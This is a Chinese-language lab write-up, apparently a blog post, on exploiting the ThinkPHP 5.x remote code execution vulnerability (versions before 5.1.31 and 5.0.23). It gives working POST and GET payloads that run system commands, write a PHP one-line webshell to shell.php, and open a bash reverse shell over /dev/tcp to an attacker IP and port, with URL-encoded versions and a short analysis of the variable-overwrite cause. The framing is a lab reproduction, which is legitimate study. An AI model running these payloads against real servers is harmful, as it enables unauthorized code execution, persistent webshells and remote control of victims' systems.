thinkphp5框架漏洞

条件:

根据ThinkPHP版本,如是5.x版本,即可使用ThinkPHP 5.x远程代码执行漏洞,无需登录,即可执行任意命令,获取服务器最高权限。

具体版本

5.x < 5.1.31

5.0.x<= 5.0.23

框架介绍:

ThinkPHP是一个免费开源的,快速、简单的面向对象的

轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的

工具fuzz:

扫描到了

但是这里靶场搭建在本机,工具也在本机,由于工具本身的问题,可能会执行不了命令。把靶场搭建在虚拟机,再去尝试发现可以成功。

poc: windos

php 复制代码
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

注意:通过post方法提交上面的poc的同时,还要通过url当中传递参数?s=captcha(指定路由规则)

操作:
原因分析:

该漏洞的本质是由变量覆盖造成的rce漏洞。

poc分析

method=get 因为captcha的路由规则是get方式下的,所以我们得让method为get,才能获取到captcha的路由

s=captcha 因为在进入exec函数后我们要switch到method中执行param函数,而这个captcha的路由刚好对应类

型为method,所以我们选择captcha

filter[]=system 覆盖变量

get[]=whoami 覆盖变量

_method=__construct 为了能够进入construct,从而覆盖变量

poc利用:
不仅可以用来执行系统命令
还可以用来写入一句话木马

补充:system函数是php当中的函数,它不仅可以用来执行系统命令也可以用来执行php代码

使用 echo向文件中输出内容的基本方法是使用IO重定向指令------">",默认情况下echo输出到标准输出(屏幕)中,使用>指令可重定向输出到文件中。

poc:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "<?php phpinfo(); ?>" > shell.php

注意echo的后面要有空格,否则写入的内容为空

通过echo输出字符串,原本是输出到屏幕当中,这里使用文件重定向,将内容输出到指定文件当中,如果文件不存在则创建文件并写入。

虽然写入的php文件当中php代码是被双引号包裹的,但是这里文件后缀就是php,只要符合php格式的,就会以php格式去解析,所以代码还是可以执行的。

poc:Linux:

_method=__construct&filter[]=system&method=get&get[]=pwd

请求路径:index.php?s=captcha

调用system 执行whoami

TP5的验证码在

/vendor/topthink/think-

captcha 目录下,文件

get请求方法poc

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

注意:需要对特殊字符使用^转义

(cmd环境下转义方式),windows环境的echo命令输出字符串到文档不用引号(单引号、双引号),部分字符url码不编码都行。

get方法写入shell poc

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php@eval($_POST[cmd]);?^> >shell.php

反弹shell(需进行url特殊符号编码)

什么是反弹shell(reverse shell)?

就是控制端监听某TCP/UDP端口,被控端发起请求到该端口建立连接,并将其命令行的输入输出转到攻击机。

这个poc是通过post方法提交的,然后url当中还是要提交?s=captcha

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=/bin/bash+-

c+"bash+-i+>%26+/dev/tcp/192.168.188.116/9999+0>%261"

特殊url编码之后的POC

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=/bin/bash+-

c+"bash%20-i%3E%26%20%2Fdev%2Ftcp%2F192.168.188.116%2F9999%200%3E%261"

反弹shell命令解释

/bin/bash -c: 这是在Linux中执行一个shell命令的标准方式。

bash -i: 这会进入交互模式的shell

>& /dev/tcp/192.168.188.116/9999 0>&1: 这部分是一个用于将输出和输入重定向到指定IP地址和

端口的命令,实现了远程连接

使用dev/tcp协议:在执行bashshell的同时,与指定的ip和端口建立tcp连接

0> :是bash命令当中的输入输出重定向

0>&1:将输入输出连接在一起

这个里面的ip就是攻击机的ip,这段代码是要发给靶机去执行bashshell,然后弹出shell之后让他访问攻击机的IP和端口,同时因为攻击机开启了对应监听的端口,所以在攻击机就获得了靶机的shell。

相关推荐
云边云科技3 小时前
门店网络重构:告别“打补丁”,用“云网融合”重塑数字竞争力!
大数据·人工智能·安全·智能路由器·零售
lingggggaaaa5 小时前
小迪安全v2023学习笔记(八十一讲)—— 框架安全&ThinkPHP&Laravel&Struts2&SpringBoot&CVE复现
笔记·学习·struts·安全·网络安全·laravel
NewCarRen5 小时前
汽车EPAS ECU功能安全建模分析:Gamma框架+深度概率编程落地ISO 26262(含寿命预测案例)
安全·汽车
Amy187021118236 小时前
中线安防保护器,也叫终端电气综合治理保护设备为现代生活筑起安全防线
人工智能·安全·智慧城市
云边云科技6 小时前
企业跨区域组网新解:SD-WAN技术打造安全稳定网络体系
运维·网络·人工智能·安全·边缘计算
猫耳君8 小时前
汽车网络安全 CyberSecurity ISO/SAE 21434 测试之一
python·安全·网络安全·汽车·iso/sae 21434·cybersecurity
Rverdoser9 小时前
如何打造自主安全的下一代域名系统
安全
德迅云安全杨德俊11 小时前
游戏盾:构筑网络安全防线,抵御DDoS攻击的解决方案
网络·安全·游戏·ddos
CV-杨帆12 小时前
大模型在题目生成中的安全研究:攻击方法与防御机制
安全
安娜的信息安全说12 小时前
开发安全利器:detect-secrets 敏感信息扫描工具实战指南
安全·信息安全·隐私数据管理